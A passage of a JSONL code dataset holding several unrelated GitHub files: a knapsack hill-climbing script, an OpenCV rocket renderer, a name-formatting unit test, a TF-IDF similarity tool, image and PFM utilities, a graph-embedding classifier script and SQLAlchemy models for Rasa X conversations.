knapsack_weight con cada iteración y la mejor solución presente\n print(\"El valor actual es: \" + str(current_value) +\" con peso un peso de: \"+str(total_weight))\n for i in range (n_iter): # La función \"range (n_iter)\" genera una secuencia de números enteros desde 0 hasta n_iter-1, y el bucle \"for\" itera sobre esta secuencia.\n neighbor = generate_neighbor(current_solution) # genera vecino mas cercano a la solucion.\n neighbor_value, total_weight = evaluate(items, knapsack_weight, neighbor) # el valor del vecino y el peso de la mochila seran evaluados a partir de los que ya tenemos.\n if neighbor_value > current_value: # si el calor del vecino es mayor al valor actual\n current_value = neighbor_value # se actualiza el valor actual a la solucion vecina.\n current_solution = neighbor # y empareja la solucion actual con el valor del vecino.\n print(\"En la iteracion: \" + str(i) + \" se escogio: \"+ str(current_solution) +\" con el valor de: \"+ str(current_value)+\" con un peso de: \"+str(total_weight))\n return current_solution, current_value # regresa la solucion actual y el valor actual\n\n\n# uso con items definidos y peso definido\nitems = [[4,12],[2,1],[2,2],[1,1],[10,4]]\nknapsack_weight = 10\nsolution, value = hill_climbing(items, knapsack_weight,10)\nprint(\"Items seleccionados:\", [items[i] for i in range(len(items)) if solution[i] == 1])\nprint(\"Valor total:\", value) #solucion peso y valor","repo_name":"Martinhh13/Sistemas-inteligentes","sub_path":"MochilaHill.py","file_name":"MochilaHill.py","file_ext":"py","file_size_in_byte":3369,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"4256264734","text":"import cv2\nimport numpy as np\nimport config as cfg\nfrom utils import *\n\nclass Renderer:\n\tdef __init__(self):\n\t\tself.canvas = np.zeros((cfg.CANVAS_H, cfg.CANVAS_W, 3)).astype(\"uint8\")\n\t\tself.rocket_body = np.array([\n\t\t\t\t\t\t\t\t[-30, -15],\n\t\t\t\t\t\t\t\t[ 30, -15],\n\t\t\t\t\t\t\t\t[ 30, 15],\n\t\t\t\t\t\t\t\t[-30, 15]\n\t\t\t\t\t\t\t\t\t])\n\n\t\tself.rocket_top = np.array([\n\t\t\t\t\t\t\t\t[-30, -15],\n\t\t\t\t\t\t\t\t[ 0, -40],\n\t\t\t\t\t\t\t\t[ 30, -15],\n\t\t\t\t\t\t\t\t\t])\n\n\t\tself.thruster_pts = np.array([\n\t\t\t\t\t\t\t\t[-5, -5],\n\t\t\t\t\t\t\t\t[ 0, -10],\n\t\t\t\t\t\t\t\t[ 5, -5],\n\t\t\t\t\t\t\t\t[ 5, 30],\n\t\t\t\t\t\t\t\t[-5, 30]\n\t\t\t\t\t\t\t\t\t])\n\n\t\tself.fire_pts = np.array([\n\t\t\t\t\t\t\t\t[-5, 30],\n\t\t\t\t\t\t\t\t[ 0, 30],\n\t\t\t\t\t\t\t\t[ 5, 30],\n\t\t\t\t\t\t\t\t[ 0, 30]\n\t\t\t\t\t\t\t\t])\n\n\n\t\tself.lander_pts = np.array([\n\t\t\t\t\t\t\t\t[-20, 15],\n\t\t\t\t\t\t\t\t[ 20, 15],\n\t\t\t\t\t\t\t\t[ 40, 40],\n\t\t\t\t\t\t\t\t[-20, 15],\n\t\t\t\t\t\t\t\t[-40, 40],\n\t\t\t\t\t\t\t\t[ 20, 15]\n\t\t\t\t\t\t\t\t\t])\n\t\n\n\tdef draw_flame_shade(self, rocket, left_thruster_angle, right_thruster_angle, flame_type = 1):\n\t\tif flame_type == 2:\n\t\t\tmultiplier1 = 0.2\n\t\t\tmultiplier2 = 2\n\t\t\tmultiplier3 = 0.15\n\t\t\tflame_color = rocket.fire_color2\n\t\telif flame_type == 3:\n\t\t\tmultiplier1 = 0.2\n\t\t\tmultiplier2 = 1.5\n\t\t\tmultiplier3 = 0.1\n\t\t\tflame_color = rocket.fire_color3\n\t\telse:\n\t\t\tmultiplier1 = 0.2\n\t\t\tmultiplier2 = 3\n\t\t\tmultiplier3 = 0.2\n\t\t\tflame_color = rocket.fire_color1\n\n\t\tright_thruster_fire_pts = self.fire_pts.copy()\n\t\tright_thruster_fire_pts[0, 1] += rocket.thruster_right_force_world_frame.get_magnitude()*multiplier1\n\t\tright_thruster_fire_pts[2, 1] += rocket.thruster_right_force_world_frame.get_magnitude()*multiplier1\n\t\tright_thruster_fire_pts[3, 1] += rocket.thruster_right_force_world_frame.get_magnitude()*multiplier2\n\n\t\tright_thruster_fire_pts[0, 0] += rocket.thruster_right_force_world_frame.get_magnitude()*multiplier3\n\t\tright_thruster_fire_pts[2, 0] -= rocket.thruster_right_force_world_frame.get_magnitude()*multiplier3\n\n\t\tright_thruster_fire_pts = get_transformed_pts(right_thruster_fire_pts, \n\t\t\t\t\t\t\tright_thruster_angle, \n\t\t\t\t\t\t\trocket.right_thruster_pos, position_vector = False)\n\t\t# cv2.polylines(self.canvas, [right_thruster_fire_pts], True, flame_color, 1)\n\t\tcv2.fillPoly(self.canvas, [right_thruster_fire_pts], flame_color)\n\n\n\t\tleft_thruster_fire_pts = self.fire_pts.copy()\n\t\tleft_thruster_fire_pts[0, 1] += rocket.thruster_left_force_world_frame.get_magnitude()*multiplier1\n\t\tleft_thruster_fire_pts[2, 1] += rocket.thruster_left_force_world_frame.get_magnitude()*multiplier1\n\t\tleft_thruster_fire_pts[3, 1] += rocket.thruster_left_force_world_frame.get_magnitude()*multiplier2\n\n\t\tleft_thruster_fire_pts[0, 0] += rocket.thruster_left_force_world_frame.get_magnitude()*multiplier3\n\t\tleft_thruster_fire_pts[2, 0] -= rocket.thruster_left_force_world_frame.get_magnitude()*multiplier3\n\t\tleft_thruster_fire_pts = get_transformed_pts(left_thruster_fire_pts, \n\t\t\t\t\t\t\tleft_thruster_angle, \n\t\t\t\t\t\t\trocket.left_thruster_pos, position_vector = False)\n\t\t# cv2.polylines(self.canvas, [left_thruster_fire_pts], True, flame_color, 1)\n\t\tcv2.fillPoly(self.canvas, [left_thruster_fire_pts], flame_color)\n\n\tdef draw_flames(self, rocket, left_thruster_angle, right_thruster_angle):\n\t\tself.draw_flame_shade(rocket, left_thruster_angle, right_thruster_angle, flame_type = 1)\n\t\tself.draw_flame_shade(rocket, left_thruster_angle, right_thruster_angle, flame_type = 2)\n\t\tself.draw_flame_shade(rocket, left_thruster_angle, right_thruster_angle, flame_type = 3)\n\n\tdef draw_thrusters(self, rocket):\n\t\tleft_thruster_angle = rocket.thruster_left_force_world_frame.get_angle() + np.pi/2\n\t\tleft_thruster_pts = get_transformed_pts(self.thruster_pts, \n\t\t\t\t\t\t\tleft_thruster_angle, \n\t\t\t\t\t\t\trocket.left_thruster_pos, position_vector = False)\n\t\t# cv2.polylines(self.canvas, [left_thruster_pts], True, rocket.thruster_color, 2)\n\t\tcv2.fillPoly(self.canvas, [left_thruster_pts], rocket.thruster_color)\n\n\t\tright_thruster_angle = rocket.thruster_right_force_world_frame.get_angle() + np.pi/2\n\t\tright_thruster_pts = get_transformed_pts(self.thruster_pts, \n\t\t\t\t\t\t\tright_thruster_angle, \n\t\t\t\t\t\t\trocket.right_thruster_pos, position_vector = False)\n\t\t# cv2.polylines(self.canvas, [right_thruster_pts], True, rocket.thruster_color, 2)\n\t\tcv2.fillPoly(self.canvas, [right_thruster_pts], rocket.thruster_color)\n\n\t\tself.draw_flames(rocket, left_thruster_angle, right_thruster_angle)\n\n\t\tpt1 = (int(rocket.pos.x - cfg.ROCKET_W//2), int(rocket.pos.y - cfg.ROCKET_H//2))\n\t\tpt2 = (int(rocket.pos.x + cfg.ROCKET_W//2), int(rocket.pos.y + cfg.ROCKET_H//2))\n\t\tcv2.rectangle(self.canvas, pt1, pt2, (0, 255, 0), 1)\n\n\n\tdef draw(self, rocket):\n\t\tbody_pts = get_transformed_pts(self.rocket_body, rocket.orientation, rocket.pos)\n\t\t# cv2.polylines(self.canvas, [body_pts], True, rocket.color, 2)\n\t\tif rocket.top_g:\n\t\t\tcv2.fillPoly(self.canvas, [body_pts], rocket.color_w)\n\t\telse:\n\t\t\tcv2.fillPoly(self.canvas, [body_pts], rocket.color)\n\t\t\n\t\ttop_pts = get_transformed_pts(self.rocket_top, rocket.orientation, rocket.pos)\n\t\t# cv2.polylines(self.canvas, [top_pts], True, rocket.top_color, 2)\n\t\tcv2.fillPoly(self.canvas, [top_pts], rocket.top_color)\n\n\t\tlander_pts = get_transformed_pts(self.lander_pts, rocket.orientation, rocket.pos)\n\t\tcv2.polylines(self.canvas, [lander_pts], False, rocket.lander_color, 2)\n\n\t\t# cv2.polylines(self.canvas, [rocket.tail.astype(\"int\")], False, rocket.lander_color, 1)\n\t\tself.draw_thrusters(rocket)\n\t\tpt = (int(rocket.pos.x), int(rocket.pos.y))\n\t\tcv2.circle(self.canvas, (rocket.goal[0], rocket.goal[1]), 5, (0, 255, 0), -1)\n\n\n\n\tdef render(self):\n\t\tcv2.imshow(\"canvas\", self.canvas)\n\t\treturn cv2.waitKey(1)\n\n\tdef clear(self):\n\t\tself.canvas = np.zeros((cfg.CANVAS_H, cfg.CANVAS_W, 3)).astype(\"uint8\")","repo_name":"zainkhan-afk/Rocket-Lander","sub_path":"renderer.py","file_name":"renderer.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42815569466","text":"def get_format_naem(first,last,middle = ''):\n\tif middle:\n\t\tfull_name = f\"{first} {middle} {last}\"\n\telse:\n\t\tfull_name = f\"{first} {last}\"\n\treturn full_name.title()\n\nimport unittest\n\nclass NameTestCase(unittest.TestCase):\n\tdef test_fist_last_name(self):\n\t\tformat_name = get_format_naem('jains','joplin')\n\t\tself.assertEqual(format_name,'Jains Joplin')\n\tdef test_first_last_middle_name(self):\n\t\tformatted_name = get_format_naem('wolfgang','mozart','amadeus')\n\t\tself.assertEqual(formatted_name,'Wolfgang Amadeus Mozart')\n\nif __name__ ==\"__main__\":\n\tunittest.main()\n","repo_name":"NULL-2019/L_22_9_torch_python","sub_path":"Lpython/ch11.py","file_name":"ch11.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"38605611955","text":"import argparse\nimport itertools\nimport os\nimport os.path\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\n\ndef main(good, bad, sample):\n good = [os.path.join(good, f) for f in os.listdir(good)\n if os.path.isfile(os.path.join(good, f))]\n bad = [os.path.join(bad, f) for f in os.listdir(bad)\n if os.path.isfile(os.path.join(bad, f))]\n\n tfidf_good = TfidfVectorizer().fit_transform(\n [open(f, errors='ignore').read()\n for f in itertools.chain(good, [sample])])\n\n tfidf_bad = TfidfVectorizer().fit_transform(\n [open(f, errors='ignore').read()\n for f in itertools.chain(bad, [sample])])\n\n sim_good = cosine_similarity(tfidf_good[-1], tfidf_good)\n sim_bad = cosine_similarity(tfidf_bad[-1], tfidf_bad)\n\n index_good = sim_good.argsort()[0][-2]\n index_bad = sim_bad.argsort()[0][-2]\n\n print('Maximum similarity with good samples: {}', sim_good[0][index_good])\n print('Maximum similarity with bad samples: {}', sim_bad[0][index_bad])\n print('Similar document: {}'.format(\n good[index_good]\n if sim_good[0][index_good] >= sim_bad[0][index_bad]\n else bad[index_bad]))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Basic cosine similarity comparator.')\n parser.add_argument('--good', help='directory were the good samples are')\n parser.add_argument('--bad', help='directory were the bad samples are')\n parser.add_argument('sample', help='file with to compare with')\n\n args = parser.parse_args()\n\n if not args.good or not args.bad:\n print('Provide directory path for good and bad samples')\n exit(1)\n\n main(args.good, args.bad, args.sample)\n","repo_name":"aplanas/cossim","sub_path":"cossim.py","file_name":"cossim.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"12548426531","text":"import os\nimport cv2\nimport numpy as np\nimport re\nfrom components.utils.CSVWriter2 import Wrapper as csv\n\ndef get_last_saved_image_id(path):\n paths = os.scandir(path)\n paths_stringified = sorted([p.name for p in paths])\n if(len(paths_stringified))==0:\n return 1\n temp = paths_stringified[-1].split(\".\")[0][-4:]\n return int(temp)+1\n\ndef save_disparity(path, disp):\n experiment_title = os.path.split(path)[-1]\n if(not os.path.isdir(path)):\n os.makedirs(path)\n counter = get_last_saved_image_id(path)\n filename = \"{exp_title}_{counter:04d}.png\".format(exp_title=experiment_title, counter=counter)\n fqn = os.path.join(path, filename)\n cv2.imwrite(fqn, disp)\n return fqn\n\ndef getNextFileName(test_folder =\"./test_outputs\", image_extension=\".png\", pre=\"test_disparity\"):\n counter = 1\n full_filename = pre + str(counter) + image_extension\n\n while os.path.isfile(os.path.join(test_folder, full_filename)):\n counter += 1\n full_filename = pre + str(counter) + image_extension\n return os.path.join(test_folder, full_filename)\n\ndef executeParallelMatching(initializedMatcher):\n result = initializedMatcher.alignImagesParallel()\n initializedMatcher.recompileObject(result)\n initializedMatcher.generateDisparity()\n return initializedMatcher\n\ndef saveTwoImages(img1, img2, test_folder =\"./test_outputs\", image_extension=\".png\", pre=\"test_disparity\"):\n fname = getNextFileName(test_folder , image_extension, pre)\n success1 = cv2.imwrite(fname, img1)\n if(success1):\n print(\"File has been successfully written to path: %s\"%(fname))\n fname = getNextFileName(test_folder , image_extension, pre)\n success2 = cv2.imwrite(fname, img2)\n if (success2):\n print(\"File has been successfully written to path: %s\"%(fname))\n return success1 and success2\n\n# Adapted from: https://stackoverflow.com/questions/17190649/how-to-obtain-a-gaussian-filter-in-python\n\ndef gaussian_kernel(dimension_x, dimension_y, sigma_x, sigma_y):\n x = cv2.getGaussianKernel(dimension_x, sigma_x)\n y = cv2.getGaussianKernel(dimension_y, sigma_y)\n kernel = x.dot(y.T)\n return kernel\n\ndef getHorizontalFeatureFilter(convolver):\n filter = np.zeros([3,3])\n filter[0, :] =1\n filter[2, :] = -1\n convolver.setFilter(filter)\n\ndef getVerticalFeatureFilter(convolver):\n filter = np.zeros([3, 3])\n filter[:, 0] = 1\n filter[:, 2] = -1\n convolver.setFilter(filter)\n\ndef getFilterByTypo(convolver):\n filter = np.zeros([3, 3])\n filter[:, 0] = 1\n filter[2, :] = -1\n convolver.setFilter(filter)\ndef add_occlusions(img, occlusions):\n masked = np.where(occlusions==0, 0, img)\n return masked\n\n\ndef apply_demo_filters(loaded_imgs):\n from components.utils import SimpleConvolution as SC\n\n convolver = SC.getOne()\n im2 = loaded_imgs[0]\n im6 = loaded_imgs[1]\n\n im2_blurred = convolver.convolve(im2)\n im6_blurred = convolver.convolve(im6)\n\n getHorizontalFeatureFilter(convolver)\n\n\n im2_h = convolver.convolve(im2)\n im6_h = convolver.convolve(im6)\n\n getVerticalFeatureFilter(convolver)\n\n im2_v = convolver.convolve(im2)\n im6_v = convolver.convolve(im6)\n\n getFilterByTypo(convolver)\n\n im2_t = convolver.convolve(im2)\n im6_t = convolver.convolve(im6)\n\n im2_features_added = im2 + im2 + im2_h + im2_t\n im6_features_added = im6 + im6 + im6_h + im6_t\n\n im2s = [im2, im2_blurred, im2_h, im2_v, im2_t, im2_features_added]\n im6s = [im6, im6_blurred, im6_h, im6_v, im6_t, im6_features_added]\n\n return im2s, im6s\n\n# adapted from https://gist.github.com/chpatrick/8935738\ndef load_pfm(file, remove_inf = True):\n file = open(file, 'rb')\n color = None\n width = None\n height = None\n scale = None\n endian = None\n\n header = file.readline().decode('utf-8').rstrip()\n if header == 'PF':\n color = True\n elif header == 'Pf':\n color = False\n else:\n raise Exception('Not a PFM file.')\n dim_line = file.readline().decode('utf-8').strip()\n dims_found = dim_line.split(\" \")\n width, height = map(int, dims_found)\n scale_line = file.readline().decode('utf-8').rstrip()\n scale = float(scale_line)\n if scale < 0: # little-endian\n endian = '<'\n scale = -scale\n else:\n endian = '>' # big-endian\n\n data = np.fromfile(file, endian + 'f').astype(np.float64)\n shape = (height, width, 3) if color else (height, width)\n img = np.flip(np.reshape(data, shape), axis=0)\n if(remove_inf):\n img = np.where(img==np.inf, 0, img)\n return img, scale\n\n","repo_name":"regorigregory/FYP_PUBLIC","sub_path":"components/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42570537294","text":"import pdb\n\nimport sys\nsys.path.append(\"../\")\nfrom sklearn.ensemble import RandomForestClassifier\nfrom GraphSAGE_embedding.main import graphsage\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\nimport numpy as np\nimport utils.CommonUtils as CommonUtils\nimport FeatureExtractor.extractors as extractors\nfrom utils import NLPUtils, ClassificationReportAVG\nfrom sklearn.metrics import classification_report\n\n\ndef encode_onehot(label_num_map, labels):\n classes_dict = {label: np.identity(len(label_num_map))[label_num_map[label], :] for label in label_num_map}\n labels_onehot = np.array(list(map(classes_dict.get, labels)), dtype=np.int32)\n return labels_onehot\n\n\ndef sample_mask(idx, l):\n mask = np.zeros(l)\n mask[idx] = 1\n return np.array(mask, dtype=bool)\n\n\ndef get_splits(y, strategy=\"all\", sample_size=200):\n '''\n 分割数据集\n '''\n idx_set = []\n for i in range(y.shape[1]):\n idx_set.append([])\n\n for i, label in enumerate(y):\n label = np.argmax(label)\n idx_set[label].append(i)\n\n idx_train = []\n idx_val = []\n idx_test = []\n\n for s in idx_set:\n # np.random.seed(1234)\n np.random.shuffle(s)\n if strategy == \"all\":\n idx_train = idx_train + s[0:int(len(s) * 0.7)]\n idx_val = idx_val + s[int(len(s) * 0.7):]\n idx_test = idx_test + s[int(len(s) * 0.8):]\n # idx_train = idx_train + s[int(len(s)*0.5):]\n # idx_val = idx_val + s[int(len(s) * 0.3):int(len(s) * 0.5)]\n # idx_test = idx_test + s[:int(len(s) * 0.5)]\n elif strategy == \"sample\":\n idx_train = idx_train + s[0:sample_size]\n idx_val = idx_val + s[int(len(s) * 0.8):]\n idx_test = idx_test + s[sample_size:]\n\n print(\"样本数量 train: {}, val: {}, test: {}\".format(len(idx_train), len(idx_val), len(idx_test)))\n\n y_train = np.zeros(y.shape, dtype=np.int32)\n y_val = np.zeros(y.shape, dtype=np.int32)\n y_test = np.zeros(y.shape, dtype=np.int32)\n y_train[idx_train] = y[idx_train]\n y_val[idx_val] = y[idx_val]\n y_test[idx_test] = y[idx_test]\n train_mask = sample_mask(idx_train, y.shape[0])\n val_mask = sample_mask(idx_val, y.shape[0])\n test_mask = sample_mask(idx_test, y.shape[0])\n\n return y_train, y_val, y_test, train_mask, val_mask, test_mask\n\nreports = []\nfor _ in range(5):\n df_data = pd.read_csv('../output/datasource_1228_without_isolate_node.csv')\n num_label_map, label_num_map = CommonUtils.get_num_label_map(df_data[\"label\"])\n onehot_labels = encode_onehot(label_num_map, list(df_data[\"label\"]))\n y_train, y_val, y_test, train_mask, val_mask, test_mask = get_splits(onehot_labels)\n y_train = [np.argmax(y) for y in y_train[train_mask]]\n y_test = [np.argmax(y) for y in y_test[test_mask]]\n\n\n # texts = list(df_data[\"text\"].apply(lambda x: NLPUtils.preprocess_text(x)))\n # embedding = extractors.tfidf_feat_extractor(texts)\n sage = graphsage()\n embedding = sage.exec()\n clf = RandomForestClassifier()\n clf.fit(embedding[train_mask], y_train)\n predict_results = clf.predict(embedding[test_mask])\n report = classification_report(y_test, predict_results, digits=3)\n print(report)\n ClassificationReportAVG.save_cr(report, './log-{}.txt'.format('mean'))\n reports.append(report)\n\nClassificationReportAVG.cr_avg(reports)\n","repo_name":"zourunxin/2020-yl-mentor-group","sub_path":"temp/zrx_temp.py","file_name":"zrx_temp.py","file_ext":"py","file_size_in_byte":3382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"14604813098","text":"import json\nfrom typing import Dict, Any, Text, Set, Union, List\n\nimport sqlalchemy as sa\nfrom sqlalchemy.orm import object_session, relationship\nfrom sqlalchemy import and_\n\nimport rasax.community.constants as constants\nfrom rasax.community.database.base import Base\nfrom rasax.community.database import utils\n\n\nclass Conversation(Base):\n \"\"\"Stores the user's conversation and its metadata.\"\"\"\n\n __tablename__ = \"conversation\"\n\n sender_id = sa.Column(sa.String, primary_key=True)\n number_user_messages = sa.Column(sa.Integer, default=0)\n latest_input_channel = sa.Column(sa.String)\n latest_event_time = sa.Column(sa.Float) # latest event time as unix timestamp\n in_training_data = sa.Column(sa.Boolean, default=True)\n review_status = sa.Column(\n sa.String, default=constants.CONVERSATION_STATUS_UNREAD, nullable=False\n )\n\n minimum_action_confidence = sa.Column(sa.Float)\n maximum_action_confidence = sa.Column(sa.Float)\n minimum_intent_confidence = sa.Column(sa.Float)\n maximum_intent_confidence = sa.Column(sa.Float)\n\n evaluation = sa.Column(sa.Text)\n interactive = sa.Column(sa.Boolean, default=False)\n created_by = sa.Column(\n sa.String, sa.ForeignKey(\"rasa_x_user.username\"), nullable=True, index=True\n )\n\n events = relationship(\n \"ConversationEvent\",\n cascade=\"all, delete-orphan\",\n back_populates=\"conversation\",\n order_by=lambda: ConversationEvent.timestamp.asc(),\n )\n\n message_logs = relationship(\"MessageLog\", back_populates=\"conversation\")\n\n unique_policies = relationship(\n \"ConversationPolicyMetadata\",\n cascade=\"all, delete-orphan\",\n back_populates=\"conversation\",\n )\n unique_actions = relationship(\n \"ConversationActionMetadata\",\n cascade=\"all, delete-orphan\",\n back_populates=\"conversation\",\n )\n unique_intents = relationship(\n \"ConversationIntentMetadata\",\n cascade=\"all, delete-orphan\",\n back_populates=\"conversation\",\n )\n unique_entities = relationship(\n \"ConversationEntityMetadata\",\n cascade=\"all, delete-orphan\",\n back_populates=\"conversation\",\n )\n\n corrected_messages = relationship(\n \"ConversationMessageCorrection\",\n cascade=\"all, delete-orphan\",\n back_populates=\"conversation\",\n )\n\n tags = relationship(\n \"ConversationTag\",\n secondary=\"conversation_to_tag_mapping\",\n backref=\"conversations\",\n )\n\n def tags_set(self) -> Set[int]:\n return {t.id for t in self.tags}\n\n @property\n def has_flagged_messages(self) -> bool:\n result = (\n object_session(self)\n .query(Conversation)\n .filter(\n and_(\n Conversation.events.any(\n and_(\n ConversationEvent.conversation_id == self.sender_id,\n ConversationEvent.is_flagged,\n )\n )\n )\n )\n .first()\n )\n return result is not None\n\n def as_dict(self) -> Dict[Text, Any]:\n from rasax.community.services.event_service import EventService\n\n result = {\n \"sender_id\": self.sender_id,\n \"sender_name\": EventService.get_sender_name(self), # displayed in the UI\n \"latest_event_time\": self.latest_event_time,\n \"latest_input_channel\": self.latest_input_channel,\n \"intents\": [i.intent for i in self.unique_intents],\n \"actions\": [a.action for a in self.unique_actions],\n \"minimum_action_confidence\": self.minimum_action_confidence,\n \"maximum_action_confidence\": self.maximum_action_confidence,\n \"minimum_intent_confidence\": self.minimum_intent_confidence,\n \"maximum_intent_confidence\": self.maximum_intent_confidence,\n \"in_training_data\": self.in_training_data,\n \"review_status\": self.review_status,\n \"policies\": [p.policy for p in self.unique_policies],\n \"n_user_messages\": self.number_user_messages,\n \"has_flagged_messages\": self.has_flagged_messages,\n \"corrected_messages\": [\n {\"message_timestamp\": c.message_timestamp, \"intent\": c.intent}\n for c in self.corrected_messages\n ],\n \"interactive\": self.interactive,\n \"tags\": list(self.tags_set()),\n \"created_by\": self.created_by,\n }\n\n return result\n\n\nclass ConversationTag(Base):\n \"\"\"Stores conversation tags.\"\"\"\n\n __tablename__ = \"conversation_tag\"\n\n id = sa.Column(sa.Integer, utils.create_sequence(__tablename__), primary_key=True)\n value = sa.Column(sa.String, nullable=False, index=True)\n color = sa.Column(sa.String, nullable=False)\n\n def as_dict(self) -> Dict[Text, Union[Text, int, List[Text]]]:\n return {\n \"id\": self.id,\n \"value\": self.value,\n \"color\": self.color,\n \"conversations\": [m.sender_id for m in self.conversations],\n }\n\n\n# Stores mapping between Conversation and ConversationTag\nconversation_to_tag_mapping = sa.Table(\n \"conversation_to_tag_mapping\",\n Base.metadata,\n sa.Column(\n \"conversation_id\",\n sa.String,\n sa.ForeignKey(\"conversation.sender_id\"),\n nullable=False,\n index=True,\n ),\n sa.Column(\n \"tag_id\",\n sa.String,\n utils.create_sequence(\"conversation_to_tag_mapping\"),\n sa.ForeignKey(\"conversation_tag.id\"),\n nullable=False,\n index=True,\n ),\n)\n\n\nclass ConversationEvent(Base):\n \"\"\"Stores a single event which happened during a conversation.\"\"\"\n\n __tablename__ = \"conversation_event\"\n\n id = sa.Column(sa.Integer, utils.create_sequence(__tablename__), primary_key=True)\n conversation_id = sa.Column(\n sa.String, sa.ForeignKey(\"conversation.sender_id\"), index=True, nullable=False\n )\n conversation = relationship(\"Conversation\", back_populates=\"events\")\n\n type_name = sa.Column(sa.String, nullable=False)\n timestamp = sa.Column(\n sa.Float, index=True, nullable=False\n ) # time of the event as unix timestamp\n intent_name = sa.Column(sa.String)\n action_name = sa.Column(sa.String)\n slot_name = sa.Column(sa.String)\n slot_value = sa.Column(sa.Text)\n policy = sa.Column(sa.String)\n is_flagged = sa.Column(sa.Boolean, default=False, nullable=False)\n data = sa.Column(sa.Text)\n message_log = relationship(\"MessageLog\", back_populates=\"event\", uselist=False)\n evaluation = sa.Column(sa.Text)\n rasa_environment = sa.Column(sa.String, default=constants.DEFAULT_RASA_ENVIRONMENT)\n\n def as_rasa_dict(self) -> Dict[Text, Any]:\n \"\"\"Return a JSON-like representation of the internal Rasa (framework)\n event referenced by this `ConversationEvent`. Attach some information\n specific to Rasa X as part of the Rasa event metadata.\n\n Returns:\n A JSON-like representation of the Rasa event referenced by this\n database entity.\n \"\"\"\n\n d = json.loads(self.data)\n\n # Add some metadata specific to Rasa X (namespaced with \"rasa_x_\")\n metadata = d.get(\"metadata\") or {}\n metadata.update({\"rasa_x_flagged\": self.is_flagged, \"rasa_x_id\": self.id})\n d[\"metadata\"] = metadata\n\n return d\n\n\nclass MessageLog(Base):\n \"\"\"Stores the intent classification results of the user messages.\n\n Indexed columns:\n - `id` (Revision: `2a216ed121dd`)\n - `hash` (Revision: `af3596f6982f`)\n - `(archived, in_training_data)` (Revision: `af3596f6982f`)\n \"\"\"\n\n __tablename__ = \"message_log\"\n\n id = sa.Column(sa.Integer, utils.create_sequence(__tablename__), primary_key=True)\n hash = sa.Column(sa.String, index=True)\n model = sa.Column(sa.String)\n archived = sa.Column(sa.Boolean, default=False)\n time = sa.Column(sa.Float) # time of the log as unix timestamp\n text = sa.Column(sa.Text)\n intent = sa.Column(sa.String)\n confidence = sa.Column(sa.Float)\n intent_ranking = sa.Column(sa.Text)\n entities = sa.Column(sa.Text)\n in_training_data = sa.Column(sa.Boolean, default=False)\n\n event_id = sa.Column(sa.Integer, sa.ForeignKey(\"conversation_event.id\"))\n event = relationship(\n \"ConversationEvent\", uselist=False, back_populates=\"message_log\"\n )\n\n conversation_id = sa.Column(sa.String, sa.ForeignKey(\"conversation.sender_id\"))\n conversation = relationship(\"Conversation\", back_populates=\"message_logs\")\n\n def as_dict(self) -> Dict[Text, Any]:\n return {\n \"id\": self.id,\n \"time\": self.time,\n \"model\": self.model,\n \"hash\": self.hash,\n \"conversation_id\": self.conversation_id,\n \"event_id\": self.event_id,\n \"user_input\": {\n \"text\": self.text,\n \"intent\": {\"name\": self.intent, \"confidence\": self.confidence},\n \"intent_ranking\": json.loads(self.intent_ranking),\n \"entities\": json.loads(self.entities),\n },\n }\n\n\nclass ConversationPolicyMetadata(Base):\n \"\"\"Stores the distinct set of used policies in a conversation.\"\"\"\n\n __tablename__ = \"conversation_policy_metadata\"\n\n conversation_id = sa.Column(\n sa.String, sa.ForeignKey(\"conversation.sender_id\"), primary_key=True\n )\n policy = sa.Column(sa.String, primary_key=True)\n conversation = relationship(\"Conversation\", back_populates=\"unique_policies\")\n\n\nclass ConversationActionMetadata(Base):\n \"\"\"Stores the distinct set of used actions in a conversation.\"\"\"\n\n __tablename__ = \"conversation_action_metadata\"\n\n conversation_id = sa.Column(\n sa.String, sa.ForeignKey(\"conversation.sender_id\"), primary_key=True\n )\n action = sa.Column(sa.String, primary_key=True)\n conversation = relationship(\"Conversation\", back_populates=\"unique_actions\")\n\n\nclass ConversationIntentMetadata(Base):\n \"\"\"Stores the distinct set of used intents in a conversation.\"\"\"\n\n __tablename__ = \"conversation_intent_metadata\"\n\n conversation_id = sa.Column(\n sa.String, sa.ForeignKey(\"conversation.sender_id\"), primary_key=True\n )\n\n intent = sa.Column(sa.String, primary_key=True)\n conversation = relationship(\"Conversation\", back_populates=\"unique_intents\")\n\n\nclass ConversationEntityMetadata(Base):\n \"\"\"Stores the distinct set of used entities in a conversation.\"\"\"\n\n __tablename__ = \"conversation_entity_metadata\"\n\n conversation_id = sa.Column(\n sa.String, sa.ForeignKey(\"conversation.sender_id\"), primary_key=True\n )\n\n entity = sa.Column(sa.String, primary_key=True)\n conversation = relationship(\"Conversation\", back_populates=\"unique_entities\")\n\n\nclass ConversationMessageCorrection(Base):\n \"\"\"Stores post hoc corrections of intents in a conversation.\"\"\"\n\n __tablename__ = \"message_correction\"\n\n conversation_id = sa.Column(\n sa.String, sa.ForeignKey(\"conversation.sender_id\"), primary_key=True\n )\n\n # time of the message correction as unix timestamp\n message_timestamp = sa.Column(sa.Float, primary_key=True)\n intent = sa.Column(sa.String)\n conversation = relationship(\"Conversation\", back_populates=\"corrected_messages\")\n","repo_name":"hoavosac99/Chat-bot-tuyen-sinh","sub_path":"rasax/community/database/conversation.py","file_name":"conversation.py","file_ext":"py","file_size_in_byte":11330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34701604035","text":"#!/usr/bin/python\r\n## Course: OOP and patterns in Python PL\r\n## Week: 5\r\n## Programming task: final project is to make a game \"Wizard in a cave\"\r\n## Student: 